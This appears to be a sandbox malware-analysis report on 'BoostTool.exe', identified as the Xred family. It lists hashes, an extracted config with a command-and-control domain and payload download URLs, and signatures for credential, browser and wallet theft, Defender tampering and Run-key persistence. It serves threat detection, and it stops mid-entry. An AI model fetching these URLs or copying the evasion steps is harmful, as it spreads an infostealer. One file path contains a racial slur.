Analysis
-
max time kernel
148s -
max time network
153s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
27-12-2024 17:08
Static task
static1
Behavioral task
behavioral1
Sample
OneStopShop.zip
Resource
win10ltsc2021-20241023-en
Behavioral task
behavioral2
Sample
BoostTool.exe
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral3
Sample
Data/Avatar/logo.png
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral4
Sample
Data/Banners/logo.png
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral5
Sample
Data/Output/[nigga] [2024-10-01] [2x 1 Month]/Failed.txt
Resource
win10ltsc2021-20241211-en
Behavioral task
behavioral6
Sample
settings.json
Resource
win10ltsc2021-20241211-en
General
-
Target
BoostTool.exe
-
Size
10.6MB
-
MD5
cb598ffa05078fd9ee2ff6b1b52d9d34
-
SHA1
31fcc9e65912072aac8e14c6bd87aad7d06133b6
-
SHA256
2db90eb0a3f229be32d32b949b3aa715c66d7525dc6b50f0d744a677bfbd617d
-
SHA512
3cad964a7fe44e466a0a9159610f4d232bdae811ad9624918b8f57243b42f1d8dea9ef526b977976b7068877963183625429e90252c2378d16f04ce6b40a9c8d
-
SSDEEP
196608:+IY6xgFW1A9/UD1zJwLUf6WPvC1kD9ayyJXsZYaEK0bOPMpy5NxHAa3hqPF6kqau:Z2J0CLC6wvRm1+0kJ+Ek7RbcCvo
Malware Config
Extracted
xred
xred.mooo.com
-
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
http://xred.site50.net/syn/SUpdate.ini
https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
http://xred.site50.net/syn/Synaptics.rar
https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download
https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
http://xred.site50.net/syn/SSLLibrary.dll
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 4 IoCs
Uses mpcmdrun utility to delete all AV definitions.
pid Process 5496 MpCmdRun.exe 5832 MpCmdRun.exe 3716 MpCmdRun.exe 5888 MpCmdRun.exe -
Xred family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5740 powershell.exe 3752 powershell.exe 6080 powershell.exe 5852 powershell.exe 4640 powershell.exe 4332 powershell.exe 3424 powershell.exe 3264 powershell.exe 6020 powershell.exe 2876 powershell.exe 5912 powershell.exe 4408 powershell.exe 4568 powershell.exe 5928 powershell.exe 2720 powershell.exe 2684 powershell.exe 3476 powershell.exe 6004 powershell.exe 6068 powershell.exe 5592 powershell.exe -
Checks computer location settings 2 TTPs 56 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation ._cache_RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation BoostTool.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe Key value queried \REGISTRY\USER\S-1-5-21-4084745894-3294430273-2212167662-1000\Control Panel\International\Geo\Nation RuntimeBroker.exe -
Clipboard Data 1 TTPs 8 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 6120 cmd.exe 5024 powershell.exe 3720 cmd.exe 4380 powershell.exe 5864 cmd.exe 700 powershell.exe 1256 cmd.exe 2592 powershell.exe -
Executes dropped EXE 64 IoCs
pid Process 656 RuntimeBroker.exe 4172 RuntimeBroker.exe 3356 ._cache_RuntimeBroker.exe 1916 Synaptics.exe 4784 ._cache_RuntimeBroker.exe 3716 RuntimeBroker.exe 1092 RuntimeBroker.exe 3260 ._cache_RuntimeBroker.exe 2064 RuntimeBroker.exe 2824 RuntimeBroker.exe 1368 ._cache_RuntimeBroker.exe 400 ._cache_RuntimeBroker.exe 1804 ._cache_RuntimeBroker.exe 852 RuntimeBroker.exe 4552 RuntimeBroker.exe 3012 ._cache_RuntimeBroker.exe 1520 RuntimeBroker.exe 4940 ._cache_RuntimeBroker.exe 3624 ._cache_RuntimeBroker.exe 2736 RuntimeBroker.exe 1352 RuntimeBroker.exe 4592 RuntimeBroker.exe 4724 RuntimeBroker.exe 3276 ._cache_RuntimeBroker.exe 4108 ._cache_RuntimeBroker.exe 3044 ._cache_RuntimeBroker.exe 3764 ._cache_RuntimeBroker.exe 1952 RuntimeBroker.exe 2292 RuntimeBroker.exe 1940 ._cache_RuntimeBroker.exe 2524 ._cache_RuntimeBroker.exe 3640 RuntimeBroker.exe 4800 RuntimeBroker.exe 4504 RuntimeBroker.exe 3828 RuntimeBroker.exe 1360 RuntimeBroker.exe 1308 RuntimeBroker.exe 2324 RuntimeBroker.exe 5472 RuntimeBroker.exe 2336 RuntimeBroker.exe 5852 RuntimeBroker.exe 1368 RuntimeBroker.exe 5316 RuntimeBroker.exe 4728 rar.exe 5896 RuntimeBroker.exe 5580 RuntimeBroker.exe 5860 RuntimeBroker.exe 3444 RuntimeBroker.exe 1388 RuntimeBroker.exe 5468 RuntimeBroker.exe 5384 RuntimeBroker.exe 1524 RuntimeBroker.exe 5548 RuntimeBroker.exe 5588 RuntimeBroker.exe 3832 RuntimeBroker.exe 4260 RuntimeBroker.exe 3588 rar.exe 5196 RuntimeBroker.exe 720 RuntimeBroker.exe 5924 RuntimeBroker.exe 2748 RuntimeBroker.exe 2492 RuntimeBroker.exe 4724 RuntimeBroker.exe 4508 RuntimeBroker.exe -
Loads dropped DLL 64 IoCs
pid Process 4172 RuntimeBroker.exe 4172 RuntimeBroker.exe 3716 RuntimeBroker.exe 3716 RuntimeBroker.exe 1092 RuntimeBroker.exe 1092 RuntimeBroker.exe 2064 RuntimeBroker.exe 2064 RuntimeBroker.exe 2824 RuntimeBroker.exe 2824 RuntimeBroker.exe 852 RuntimeBroker.exe 852 RuntimeBroker.exe 4552 RuntimeBroker.exe 4552 RuntimeBroker.exe 1520 RuntimeBroker.exe 1520 RuntimeBroker.exe 1352 RuntimeBroker.exe 1352 RuntimeBroker.exe 2736 RuntimeBroker.exe 2736 RuntimeBroker.exe 4592 RuntimeBroker.exe 4592 RuntimeBroker.exe 4724 RuntimeBroker.exe 4724 RuntimeBroker.exe 1952 RuntimeBroker.exe 1952 RuntimeBroker.exe 2292 RuntimeBroker.exe 2292 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 4800 RuntimeBroker.exe 1308 RuntimeBroker.exe 1308 RuntimeBroker.exe 1308 RuntimeBroker.exe 1308 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe 3828 RuntimeBroker.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Synaptics Pointing Device Driver = "C:\\ProgramData\\Synaptics\\Synaptics.exe" RuntimeBroker.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 58 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 12 IoCs
pid Process 4100 tasklist.exe 1904 tasklist.exe 2336 tasklist.exe 5852 tasklist.exe 1728 tasklist.exe 5420 tasklist.exe 3912 tasklist.exe 4696 tasklist.exe 3904 tasklist.exe 6100 tasklist.exe 5288 tasklist.exe 5884 tasklist.exe -
Hide Artifacts: Hidden Files and Directories 1 TTPs 4 IoCs
pid Process 4156 cmd.exe 3400 cmd.exe 6140 cmd.exe 1156 cmd.exe -
resource yara_rule behavioral2/memory/4800-328-0x00007FFF47E40000-0x00007FFF482A6000-memory.dmp upx behavioral2/memory/4800-329-0x00007FFF4B4C0000-0x00007FFF4B4E4000-memory.dmp upx behavioral2/memory/4800-330-0x00007FFF5E2F0000-0x00007FFF5E2FF000-memory.dmp upx behavioral2/memory/4800-356-0x00007FFF48320000-0x00007FFF4834C000-memory.dmp upx behavioral2/memory/3828-360-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp upx behavioral2/memory/4800-359-0x00007FFF47A90000-0x00007FFF47C0A000-memory.dmp upx behavioral2/memory/4800-364-0x00007FFF475B0000-0x00007FFF475DE000-memory.dmp upx behavioral2/memory/4800-363-0x00007FFF5E2E0000-0x00007FFF5E2ED000-memory.dmp upx behavioral2/memory/4800-366-0x00007FFF3F300000-0x00007FFF3F679000-memory.dmp upx behavioral2/memory/4800-371-0x00007FFF4B4C0000-0x00007FFF4B4E4000-memory.dmp upx behavioral2/memory/4800-372-0x00007FFF4F970000-0x00007FFF4F985000-memory.dmp upx behavioral2/memory/4800-374-0x00007FFF5DD00000-0x00007FFF5DD0D000-memory.dmp upx behavioral2/memory/4800-379-0x00007FFF422E0000-0x00007FFF423F8000-memory.dmp upx behavioral2/memory/3828-378-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp upx behavioral2/memory/1308-401-0x00007FFF3EE90000-0x00007FFF3F2F6000-memory.dmp upx behavioral2/memory/4800-377-0x00007FFF47A90000-0x00007FFF47C0A000-memory.dmp upx behavioral2/memory/4800-373-0x00007FFF4B3C0000-0x00007FFF4B3DF000-memory.dmp upx behavioral2/memory/3828-370-0x00007FFF5E240000-0x00007FFF5E24F000-memory.dmp upx behavioral2/memory/3828-369-0x00007FFF474C0000-0x00007FFF474E4000-memory.dmp upx behavioral2/memory/4800-368-0x00007FFF47E40000-0x00007FFF482A6000-memory.dmp upx behavioral2/memory/4800-365-0x00007FFF474F0000-0x00007FFF475A8000-memory.dmp upx behavioral2/memory/4800-362-0x00007FFF475E0000-0x00007FFF475F9000-memory.dmp upx behavioral2/memory/4800-358-0x00007FFF4B3C0000-0x00007FFF4B3DF000-memory.dmp upx behavioral2/memory/4800-357-0x00007FFF4B4A0000-0x00007FFF4B4B8000-memory.dmp upx behavioral2/memory/1308-406-0x00007FFF5DC90000-0x00007FFF5DC9F000-memory.dmp upx behavioral2/memory/4800-405-0x00007FFF475B0000-0x00007FFF475DE000-memory.dmp upx behavioral2/memory/1308-403-0x00007FFF47E10000-0x00007FFF47E34000-memory.dmp upx behavioral2/memory/4800-402-0x00007FFF475E0000-0x00007FFF475F9000-memory.dmp upx behavioral2/memory/3828-416-0x00007FFF47C20000-0x00007FFF47D9A000-memory.dmp upx behavioral2/memory/3828-421-0x00007FFF40A00000-0x00007FFF40D79000-memory.dmp upx behavioral2/memory/3828-420-0x00007FFF470F0000-0x00007FFF471A8000-memory.dmp upx behavioral2/memory/3828-419-0x00007FFF47470000-0x00007FFF4749E000-memory.dmp upx behavioral2/memory/3828-418-0x00007FFF5D8B0000-0x00007FFF5D8BD000-memory.dmp upx behavioral2/memory/3828-417-0x00007FFF474A0000-0x00007FFF474B9000-memory.dmp upx behavioral2/memory/3828-415-0x00007FFF47DA0000-0x00007FFF47DBF000-memory.dmp upx behavioral2/memory/3828-414-0x00007FFF47DC0000-0x00007FFF47DD8000-memory.dmp upx behavioral2/memory/3828-413-0x00007FFF47DE0000-0x00007FFF47E0C000-memory.dmp upx behavioral2/memory/4800-412-0x00007FFF3F300000-0x00007FFF3F679000-memory.dmp upx behavioral2/memory/4800-411-0x00007FFF474F0000-0x00007FFF475A8000-memory.dmp upx behavioral2/memory/1308-481-0x00007FFF42160000-0x00007FFF422DA000-memory.dmp upx behavioral2/memory/3828-480-0x00007FFF5D8B0000-0x00007FFF5D8BD000-memory.dmp upx behavioral2/memory/3828-479-0x00007FFF47DA0000-0x00007FFF47DBF000-memory.dmp upx behavioral2/memory/3828-478-0x00007FFF47620000-0x00007FFF47A86000-memory.dmp upx behavioral2/memory/1308-505-0x00007FFF47710000-0x00007FFF47A89000-memory.dmp upx behavioral2/memory/1308-506-0x00007FFF47CB0000-0x00007FFF47D68000-memory.dmp upx behavioral2/memory/1308-504-0x00007FFF47D70000-0x00007FFF47D9E000-memory.dmp upx behavioral2/memory/1308-520-0x00007FFF47CB0000-0x00007FFF47D68000-memory.dmp upx behavioral2/memory/1308-522-0x00007FFF4D190000-0x00007FFF4D19D000-memory.dmp upx behavioral2/memory/1308-521-0x00007FFF47C70000-0x00007FFF47C85000-memory.dmp upx behavioral2/memory/1308-519-0x00007FFF47710000-0x00007FFF47A89000-memory.dmp upx behavioral2/memory/1308-518-0x00007FFF47D70000-0x00007FFF47D9E000-memory.dmp upx behavioral2/memory/1308-517-0x00007FFF58CC0000-0x00007FFF58CCD000-memory.dmp upx behavioral2/memory/1308-516-0x00007FFF47DA0000-0x00007FFF47DB9000-memory.dmp upx behavioral2/memory/1308-515-0x00007FFF42160000-0x00007FFF422DA000-memory.dmp upx behavioral2/memory/1308-514-0x00007FFF46CD0000-0x00007FFF46CEF000-memory.dmp upx behavioral2/memory/1308-513-0x00007FFF47400000-0x00007FFF47418000-memory.dmp upx behavioral2/memory/1308-512-0x00007FFF47420000-0x00007FFF4744C000-memory.dmp upx behavioral2/memory/1308-511-0x00007FFF5DC90000-0x00007FFF5DC9F000-memory.dmp upx behavioral2/memory/1308-510-0x00007FFF47E10000-0x00007FFF47E34000-memory.dmp upx behavioral2/memory/1308-509-0x00007FFF3EE90000-0x00007FFF3F2F6000-memory.dmp upx behavioral2/memory/1308-508-0x00007FFF4D190000-0x00007FFF4D19D000-memory.dmp upx behavioral2/memory/1308-507-0x00007FFF47C70000-0x00007FFF47C85000-memory.dmp upx behavioral2/memory/1308-503-0x00007FFF58CC0000-0x00007FFF58CCD000-memory.dmp upx behavioral2/memory/1308-502-0x00007FFF47DA0000-0x00007FFF47DB9000-memory.dmp upx -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Logs\CBS\CBS.log TiWorker.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 12 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 16 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Synaptics.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RuntimeBroker.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 8 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2524 PING.EXE 3588 cmd.exe 6084 PING.EXE 1508 cmd.exe 3476 PING.EXE 5552 cmd.exe 5944 PING.EXE 1692 cmd.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 8 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 5572 netsh.exe 5116 cmd.exe 5152 netsh.exe 6048 cmd.exe 5836 netsh.exe 3276 cmd.exe 4404 netsh.exe 1520 cmd.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Detects videocard installed 1 TTPs 4 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 2512 WMIC.exe 5532 WMIC.exe 420 WMIC.exe 2824 WMIC.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Gathers system information 1 TTPs 4 IoCs
Runs systeminfo.exe.
pid Process 5172 systeminfo.exe 5856 systeminfo.exe 4600 systeminfo.exe 1596 systeminfo.exe -
Modifies registry class 15 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ RuntimeBroker.exe Key created 